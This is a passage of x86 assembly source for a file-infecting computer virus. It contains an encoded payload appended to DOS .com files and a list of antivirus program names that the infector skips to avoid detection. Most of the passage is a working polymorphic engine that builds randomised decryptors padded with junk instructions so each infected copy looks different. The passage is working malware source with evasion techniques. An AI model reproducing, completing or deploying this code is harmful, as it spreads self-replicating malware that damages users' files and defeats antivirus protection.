        mov     eax,12345678h
distance        equ $-4
        push    eax
        ret
EndJmpToCode:
;----------------------------------------------------------------------------;

;this sweet code will be appended to .com files (234 / 0eah bytes large)

dospayload      label   byte
        db      0e8h,09h,00h,0ebh,012h,08bh,0ech,083h,0c4h,020h,0ebh,04h,0ebh
        db      0fch,0cdh,021h,0e8h,02ch,00h,0ebh,0eeh,0e2h,0f9h,058h,08bh
        db      0ech,02dh,03h,01h,0fbh,095h,0b4h,04ch,080h,0ech,022h,0cdh,021h
        db      080h,0feh,07h,075h,05h,080h,0fah,07h,074h,017h,0beh,0eah,01h
        db      03h,0f5h,0bfh,00h,01h,0a5h,0a5h,0b8h,00h,01h,050h,0c3h,0ebh
        db      05h,0b8h,00h,04ch,0cdh,021h,0c3h,0beh,058h,01h,03h,0f5h,08bh
        db      0feh,0b9h,092h,00h,0fch,0ach,0f6h,0d8h,0aah,0e2h,0fah,018h
        db      07dh,00h,098h,00h,048h,0f9h,047h,0f6h,00h,018h,08dh,00h,042h
        db      070h,0ffh,0fdh,0bh,018h,0a8h,00h,018h,0abh,00h,047h,0d4h,0ffh
        db      018h,09eh,00h,018h,0b4h,00h,06h,015h,02h,0a0h,04ch,0d4h,033h
        db      0dfh,076h,026h,04ch,0d4h,033h,0dfh,0d6h,02dh,080h,06h,0ech
        db      08eh,0bh,09fh,03dh,0a9h,09fh,095h,09bh,0e0h,08bh,090h,0d4h
        db      0e0h,0b2h,09bh,091h,0d2h,0d2h,0d2h,00h,0ach,098h,09bh,0e0h
        db      0b3h,09fh,08ch,08eh,097h,088h,0e0h,098h,09fh,08dh,0e0h,087h
        db      091h,08bh,0d2h,0d2h,0d2h,00h,089h,0c7h,088h,0d2h,093h,0bfh
        db      0ach,0aeh,097h,0a8h,0e0h,0adh,0aah,0a8h,00h,018h,0eah,00h,0cdh
        db      01h,04ch,0f6h,054h,055h,018h,055h,01h,0f6h,040h,08bh,09h,047h
        db      0e2h,00h,018h,05fh,01h,01eh,05h,03dh,048h,0fdh,00h,033h,0f0h
        db      04ch,0ffh,04bh,0e0h,033h,0f0h,03dh
first4bts       dd      ?       ;the first 4 overwritten bytes from the host
dospayloadsize  equ $-offset dospayload

badnames        label byte
        db      04h,"_AVP"                      ;_AVP files
        db      03h,"NAV"                       ;Norton AV
        db      02h,"TB"                        ;Tbscan, Tbav32, whole shit
        db      02h,"F-"                        ;F-Prot
        db      03h,"PAV"                       ;Panda AV
        db      03h,"DRW"                       ;Doc. Web
        db      04h,"DSAV"                      ;Doc. Salomon
        db      03h,"NOD"                       ;NodIce
        db      03h,"SCA"                       ;SCAN
        db      05h,"NUKEN"                     ;Nukenabber? (error with infecting)
        db      04h,"YAPS"                      ;YetAnotherPortScanner (selfcheck)
        db      03h,"HL."                       ;HalfLife (thx to Ghostie!)
        db      04h,"MIRC"                      ;mIRC = strange
        db      0h

;--------------------------------------------------------------------------
;       * Checks the name of the file to be infected
;--------------------------------------------------------------------------

checkname:                                      ;check for some bad names
        pushad

        mov     ebp,edi                         ;delta
        mov     edi,esi                         ;points to filename

        mov     al,'.'
        cld
        scasb                   ;search from left to right for the dot
        jne     $-1

        std
        mov     al,'\'          ;search from right to left for the \
        scasb
        jne     $-1

        inc     edi             ;edi pointed to char before \
        inc     edi             ;edi pointed to \

        cld

        lea     esi,[offset badnames+ebp-start]

checkname2:
        xor     eax,eax                         ;for load AL
        lodsb                                   ;size of string in al
        or      al,al
        jz      didit
        mov     ecx,eax                         ;counter for bytes
        push    edi                             ;save pointer to filename
rep     cmpsb                                   ;compare stringbyte
        pop     edi
        jz      ArghItIsAshitFile
        add     esi,ecx
        jmp     checkname2

ArghItIsAshitFile:
        popad
        stc
        ret
didit:
        popad
        clc
        ret
;--------------------------------------------------------------------------


;--------------------------------------------------------------------------
;       *** POLYMORFIC engine which generates decrypter & encrypts code ***
;--------------------------------------------------------------------------


;
; The generated code will look like this:
;
; pushad
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
; mov keyregister,randomvalue
; sub keyregister,randomvalue
; mov counterreg,size
; again:
; mov tempregister,[RegUsedAsPointer]
; xor tempregister,keyregister
; mov [RegUsedAsPointer],tempregister
; add RegUsedAsPointer,4
; dec counterreg
; pushf
; popf
; jz  exit
; jmp again
; exit:
;
;
; between each instruction some random code is putted.

polysz  equ     offset polyend - offset encrypt
encrypt:
        push    eax
        push    ebx
        push    edx
        push    esi
        push    edi

        lea     edi,[offset viruscopy+ebp-start]        ;edi points to buffer        

        call    gengarbage

        ;--------PUSHAD--
        mov     al,60h                  ;pushad
        stosb
        ;--------MOV-----

        call    gengarbage

getregforoffset:                ;This reg will contain the offset of code
        call    getrndal
        cmp     al,4                    ;do not use ESP
        je      getregforoffset
        cmp     al,5                    ;do not use EBP (!)
        je      getregforoffset

        mov     ch,al                   ;backup register for offset code



        ;--LEA reg,[EAX+x]-             ;lea
        shl     al,3
        mov     ah,08dh
        xchg    ah,al
        add     ah,080h
        push    edi                     ;save location for patch
        stosw
        stosd                           ;doesn't matter what we store
        ;------------------
        

        call    gengarbage
      

getregforkey:                           ;This reg will contain the crypt key
        call    getrndal
        cmp     al,4                    ;do not use ESP
        je      getregforkey
        cmp     al,1                    ;do not use ECX
        je      getregforkey
        cmp     al,ch
        je      getregforkey

        mov     cl,al                   ;backup register

        call    gengarbage

        ;--------MOV-----
        add     al,0b8h                 ;make a MOV reg, rndvalue
        stosb
        call    get_rnd32
        stosd
        ;----------------

        mov     ebx,eax                 ;backup key
        mov     ah,cl                   ;register back in ah

        call    gengarbage

        ;--------SUB-----
        mov     al,081h                 ;make a SUB reg, rndvalue
        add     ah,0e8h
        stosw
        call    get_rnd32
        stosd
        ;----------------


        sub     ebx,eax                         ;Save the cryptkey

        
getregforsize:
        call    getrndal
        cmp     al,4                    ;do not use ESP
        je      getregforsize
        cmp     al,cl                   ;nor keyreg
        je      getregforsize
        cmp     al,ch                   ;nor offsetreg
        je      getregforsize

        mov     dh,al


        call    gengarbage

        ;----MOVSIZE-----               ;mov ecx,virussize (size to decrypt)
        add     al,0b8h
        stosb
        mov     eax,virusz/4
        stosd
        ;----------------


        ;***    AT THIS POINT IS EDI THE OFFSET FOR THE JMP     ***

        mov     esi,edi


        ;8b + 00, eax=3,[eax=0]        ch = reg2


getregtoxor:            ;This reg will contain crypted code and'll be xored
        call    getrndal
        cmp     al,4                    ;do not use ESP
        je      getregtoxor
        cmp     al,cl
        je      getregtoxor             ;do not use the keyreg
        cmp     al,ch
        je      getregtoxor             ;do not use the offset reg
        cmp     al,dh
        je      getregtoxor


        mov     dl,al


        call    gengarbage


        ;-MOV REG3,[REG2]      ;make a mov reg3,[reg2] reg2=offset code
        shl     al,3
        or      al,ch
        mov     ah,08bh
        xchg    al,ah
        stosw
        ;----------------


        call    gengarbage


        ;-XOR REG3,REG1--       ;make a xor reg3,reg1 reg1=key
        mov     al,dl
        shl     al,3
        or      al,cl
        add     al,0c0h
        mov     ah,33h
        xchg    al,ah
        stosw
        ;----------------


        call    gengarbage


        mov     al,dl

        ;-MOV [REG2],REG3       ;make a mov [reg2],reg3 reg2=offset code 
        shl     al,3
        or      al,ch
        mov     ah,089h
        xchg    al,ah
        stosw
        ;----------------


        call    gengarbage


        ;-ADD REG2,4-----       ;adds 4 to the offset register
        mov     al,83h
        stosb
        mov     ax,004c0h
        add     al,ch
        stosw
        ;----------------


        call    gengarbage


        ;---DEC REG4-----       ;decreases counter reg4 (size)
        mov     al,dh
        add     al,048h
        stosb
        ;----------------

        mov     eax,9c66h       ;pushf
        stosw


        call    gengarbage

        inc     ah              ;popf
        stosw


        ;---JZ OVER------
        mov     ax,074h
        stosw
        push    edi
        ;----------------


        mov     eax,edi         ;can't generate > 80h-5 bytes of garbage 
regenerate:                     ;between JZ beh - poly - JMP - beh: code...
        mov     edi,eax         ;restore EDI for ja 
        
        call    gengarbage

        mov     edx,edi
        sub     edx,eax
        cmp     edx,080h-5      ;80h = max JZ distance, 5 is size of JMP BACK
        ja      regenerate      


        ;----JMP BACK----
        sub     esi,edi
        mov     al,0e9h
        stosb
        mov     eax,0fffffffbh
        add     eax,esi
        stosd
        ;----------------



        ;----PATCH JZ----
        pop     esi             ;esi-1 = jz value

        mov     eax,edi
        sub     eax,esi
        mov     byte ptr [esi-1],al

        ;----------------

        call    gengarbage


        ;----POPAD-------
        mov     al,61h                  ;popad
        stosb
        ;----------------


        call    gengarbage


        ;----PATCH LEA---        
        pop     esi                     ;patch LEA reg1,[EAX+startofcrypted]
        push    edi
        sub     edi,offset viruscopy-start
        sub     edi,ebp
        mov     dword ptr [esi+2],edi
        pop     edi
        ;----------------


        mov     ecx,virusz/4            ;copy encrypted virus code after poly
        mov     esi,ebp                 ;decryptors
cryptit:
        lodsd
        xor     eax,ebx
        stosd
        loop    cryptit

        sub     edi,offset viruscopy-start
        sub     edi,ebp
        mov     ecx,edi                         ;virus size + poly in ECX

        pop     edi
        pop     esi
        pop     edx
        pop     ebx
        pop     eax
        ret


;----------------------------------------------------------------------------;
;       Generates lot of rnd instructions which look good but do nothing
;       (they undo themself indirect)
;----------------------------------------------------------------------------;

gengarbage:
        push    eax
        push    ebx
        push    ecx
        push    edx
        push    esi

garbageloop:

        call    get_rnd32

        and     al,1111b

        cmp     al,1
        je      genadd                  ;OK

        cmp     al,2
        je      gensub                  ;OK

        cmp     al,3
        je      genxor                  ;OK

        cmp     al,4
        je      genmov                  ;OK

        cmp     al,5
        je      genpush                 ;OK

        cmp     al,6
        je      geninc                  ;OK

        cmp     al,7
        je      gendec                  ;OK

        cmp     al,8
        je      gencmp                  ;OK

        cmp     al,9
        je      genjunk                 ;OK

        cmp     al,0eh
        jb      garbageloop

exitgen:

        pop     esi
        pop     edx
        pop     ecx
        pop     ebx
        pop     eax

        ret

;-----------------------------------------------------------------------------
;       Generates random add
;-----------------------------------------------------------------------------
genadd:
        call    getrndal

        cmp     al,4
        je      genadd                          ;4 = esp, leave him alone

        cmp     ah,80h
        jb      addandsub                       ;generate an add - code - sub

        and     eax,111b

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetoadd                               ;yep

        call    pushregister

        call    gengarbage

        call    randomadd                       ;adds a value or register

        call    gengarbage

        call    popregister

        jmp     exitgen

savetoadd:
        call    randomadd

        jmp     exitgen

addandsub:
        push    eax

        xchg    al,ah
        mov     al,081h
        add     ah,0c0h

        stosw
        push    eax

        call    get_rnd32
        stosd
        push    eax

        call    gengarbage

        pop     ebx
        pop     eax

        add     ah,028h
        stosw
        mov     eax,ebx
        stosd

        pop     eax
        jmp     exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random sub
;-----------------------------------------------------------------------------
gensub:
        call    getrndal

        cmp     al,4
        je      gensub                          ;4 = esp, leave him alone

        cmp     ah,80h
        jb      subandadd                       ;generate an add - code - sub

        and     eax,111b

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetosub                               ;yep

        call    pushregister

        call    gengarbage

        call    randomsub                       ;adds a value or register

        call    gengarbage

        call    popregister

        jmp     exitgen

savetosub:

        call    randomsub

        jmp     exitgen

subandadd:

        push    eax

        xchg    al,ah
        mov     al,081h
        add     ah,0e8h

        stosw
        push    eax

        call    get_rnd32
        stosd
        push    eax

        call    gengarbage

        pop     ebx
        pop     eax

        sub     ah,028h
        stosw
        mov     eax,ebx
        stosd

        pop     eax

        jmp     exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random xor
;-----------------------------------------------------------------------------
genxor:
        call    getrndal

        cmp     al,4
        je      genxor

        cmp     ah,80h
        jb      genxorxor                       ;generate an xor - code - xor

        and     eax,111b

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetoxor                               ;yep

        call    pushregister                    ;first push

        call    gengarbage                      ;generate some garbage

        call    randomxor                       ;xors with a value or register

        call    gengarbage                      ;generate some garbage

        call    popregister                     ;and pop it

        jmp     exitgen

savetoxor:

        call    randomxor

        jmp     exitgen

genxorxor:
        push    eax

        xchg    al,ah
        add     ah,0f0h
        mov     al,081h

        stosw
        push    eax

        call    get_rnd32
        stosd
        push    eax

        call    gengarbage

        pop     ebx
        pop     eax

        stosw

        mov     eax,ebx

        stosd

        pop     eax
        jmp     exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random mov
;-----------------------------------------------------------------------------
genmov:
        call    getrndal

        cmp     al,4
        je      genmov

        and     eax,111b                        ; eax <- al

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetomov                               ;yep

        call    pushregister                    ;first push

        call    gengarbage                      ;generate some garbage

        call    randommov                       ;movs a value or register

        call    gengarbage                      ;generate some garbage

        call    popregister                     ;and pop it

        jmp     exitgen

savetomov:

        call    randommov

        jmp     exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random push
;-----------------------------------------------------------------------------
genpush:
        call    getrndal
        cmp     al,4
        je      genpush

        and     eax,111b

        call    pushregister

        call    gengarbage

        call    popregister

        jmp     exitgen
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random inc
;-----------------------------------------------------------------------------
geninc:                                         ;40
        call    getrndal
        cmp     al,4
        je      geninc

        cmp     ah,80h
        ja      genincdec

        and     eax,111b

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetoinc

        call    pushregister

        call    gengarbage

        add     al,040h
        stosb

        call    gengarbage

        sub     al,040h

        call    popregister

        jmp     exitgen

savetoinc:
        add     al,040h
        stosb
        jmp     exitgen

genincdec:
        add     al,40h                          ;inc
        stosb

        call    gengarbage

        add     al,8                            ;dec
        stosb

        jmp     exitgen


;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random dec
;-----------------------------------------------------------------------------
gendec:                                         ;48
        call    getrndal
        cmp     al,4
        je      gendec

        cmp     ah,80h
        ja      gendecinc

        and     eax,111b

        cmp     byte ptr [ebp+offset pushtable+eax-start],0h  ;is the reg. pushed?
        ja      savetodec

        call    pushregister

        call    gengarbage

        add     al,048h
        stosb

        call    gengarbage

        sub     al,048h

        call    popregister

        jmp     exitgen

savetodec:
        add     al,048h
        stosb
        jmp     exitgen

gendecinc:
        add     al,48h
        stosb

        call    gengarbage

        sub     al,8h
        stosb
        jmp     exitgen

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Pushes register in al
;-----------------------------------------------------------------------------
pushregister:
        push    eax

        inc     byte ptr [ebp+offset pushtable+eax-start]     ;set flag for reg.

        add     al,050h
        stosb
        
        pop     eax
        ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Pops register in al
;-----------------------------------------------------------------------------
popregister:
        push    eax

        dec     byte ptr [ebp+offset pushtable+eax-start]     ;unflag for reg.

        add     al,058h
        stosb

        pop     eax
        ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random add reg, value or add reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomadd:
        push    eax

        call    get_rnd32

        cmp     al,80h
        pop     eax
        push    eax
        ja      addregreg

        call    randomaddvalue

rndaddb:
        pop     eax
        ret

addregreg:
        call    randomaddreg
        jmp     rndaddb

;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates random add reg,value - reg = al
;-----------------------------------------------------------------------------


;           81 c0+reg value
; reg = eax 05 value

randomaddvalue:
        push    eax

        or      al,al                                   ;reg = eax?
        jz      addeax                                  ;special

        xchg    al,ah
        mov     al,081h
        add     ah,0c0h

        stosw

backfromaddeax:

        call    get_rnd32

        stosd

        pop     eax
        ret

addeax:

        mov     al,05h
        stosb
        jmp     backfromaddeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random add reg1,reg2 - reg1 = al 
;-----------------------------------------------------------------------------
randomaddreg:
        push    eax

        mov     bl,al

        call    getrndal

        shl     bl,3

        or      al,bl                                   ;mix instructions
        
        add     al,0c0h
        mov     ah,03h
        xchg    ah,al

        stosw

        pop     eax
        ret
;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates random sub reg, value or sub reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomsub:

        push    eax

        call    get_rnd32

        cmp     al,80h
        pop     eax
        push    eax
        ja      subregreg

        call    randomsubvalue

rndsubb:
        pop     eax
        ret

subregreg:
        call    randomsubreg
        jmp     rndsubb

;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates random sub reg,value - reg = al
;-----------------------------------------------------------------------------


;           81 c0+reg value
; reg = eax 05 value

randomsubvalue:
        push    eax

        or      al,al                                   ;reg = eax?
        jz      subeax                                  ;special

        xchg    al,ah
        mov     al,081h
        add     ah,0e8h

        stosw

backfromsubeax:

        call    get_rnd32

        stosd

        pop     eax
        ret

subeax:

        mov     al,05h
        stosb
        jmp     backfromsubeax

;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates random sub reg1,reg2 - reg1 = al 
;-----------------------------------------------------------------------------
randomsubreg:
        push    eax

        mov     bl,al

        call    getrndal

        shl     bl,3

        or      al,bl                                   ;mix instructions
        
        add     al,0c0h
        mov     ah,03h
        xchg    ah,al

        stosw

        pop     eax
        ret
;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates a xor reg, value or xor reg, reg2 - reg = al
;-----------------------------------------------------------------------------
randomxor:

        push    eax
        call    get_rnd32
        cmp     al,80h
        pop     eax
        push    eax
        ja      xorvalue

        call    randomxorreg

rndxorr:

        pop     eax
        ret

xorvalue:

        call    randomxorvalue
        jmp     rndxorr
;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates a random xor reg,reg2 - reg = al
;-----------------------------------------------------------------------------
randomxorreg:
        push    eax                                     ;6633

        mov     bl,al

        call    getrndal

        shl     bl,3

        or      al,bl                                   ;mix instructions

        add     al,0c0h
        mov     ah,033h

        xchg    ah,al

        stosw

        pop     eax
        ret
;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generates a random xor reg,value
;-----------------------------------------------------------------------------
randomxorvalue:
        push    eax

        add     al,0f0h
        mov     ah,081h
        
        xchg    al,ah

        stosw

        call    get_rnd32

        stosd

        pop     eax
        ret
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       generates a random mov reg,value or reg,reg2
;-----------------------------------------------------------------------------
randommov:
        push    eax

        cmp     ah,080h
        jb      movreg

        call    randommovvalue

movback:

        pop     eax
        ret

movreg:
        call    randommovreg
        jmp     movback
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;       Generates a random mov reg,value
;-----------------------------------------------------------------------------
randommovvalue:
        push    eax

        add     al,0b8h

        stosb

        call    get_rnd32

        stosd

        pop     eax
        ret

;-----------------------------------------------------------------------------
;       generates a random mov reg,reg2
;-----------------------------------------------------------------------------
randommovreg:                                   ;8b (c0+reg) or reg2
        push    eax
        mov     bl,al

        call    getrndal

        shl     bl,3

        or      al,bl                                   ;mix instructions

        xchg    ah,al

        mov     al,08bh
        add     ah,0c0h

        stosw

        pop     eax
        ret

;-----------------------------------------------------------------------------
;       generates a random cmp reg,reg2 or cmp reg,value
;-----------------------------------------------------------------------------
gencmp:                                    ;39/3b
        call    get_rnd32

        cmp     ah,0c0h
        jb      gencmp

        cmp     al,80h
        ja      gencmpvalue

        push    eax

        call    get_rnd32
        mov     bh,039h
        cmp     al,80h
        ja      gencmp1
        add     bh,2
gencmp1:

        pop     eax

        mov     al,bh

        cld
        stosw
        jmp     exitgen

gencmpvalue:                            ;81f8

        and     eax,0111b
        add     ax,081f8h

        xchg    al,ah

        stosw

        call    get_rnd32

        stosd
        jmp     exitgen
        

;-----------------------------------------------------------------------------


;-----------------------------------------------------------------------------
;       Generate junk   f8 - fd
;-----------------------------------------------------------------------------
genjunk:
        call    get_rnd32
        cmp     al,0f8h
        jb      genjunk
        cmp     al,0fdh
        ja      genjunk

        stosb

        jmp     exitgen
;-----------------------------------------------------------------------------





getrndal:
        call    get_rnd32
        and     al,111b
        ret


rdtcs   equ     <dw 310Fh>

get_rnd32:                                      ;main part by GriYo / 29A
        push    ecx
        push    ebx
        push    edx
        push    edi
        push    esi

        mov     eax,dword ptr [ebp+rnd32_seed-start]
        mov     ecx,eax
        imul    eax,41C64E6Dh
        add     eax,00003039h
        mov     dword ptr [ebp+rnd32_seed-start],eax

        xchg    eax,ecx
        rdtcs                                   ;just 4 some xtra randomness
        xchg    eax,ecx
        xor     eax,ecx
        
        pop     esi
        pop     edi
        pop     edx
        pop     ebx
        pop     ecx
        ret

polyend:

db      "(c)"                           ;just some junk

end:

;----------------------------------------------------------------------------;



pointertope     dd      ?

if debug eq 1
death           dd      ?               ;kill ourself flag
endif

busy            dd      ?
filename        db      100h dup (0h)
peheader        db      1024 dup (0h)
whereappend     dd      ?
pushtable       db      8 dup (0h)

viruscopy       db      (virusz+1000) dup (0h)  ;virussize + poly

memend:

_CODE   ends

;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
_DATA   segment dword use32 public 'DATA'
fill    db      ?
_DATA   ends
_burp   segment dword use32 public 'LiFEwiRE'
fill2   db      ?
_burp   ends
;----------------------------------------------------------------------------;

end     start
end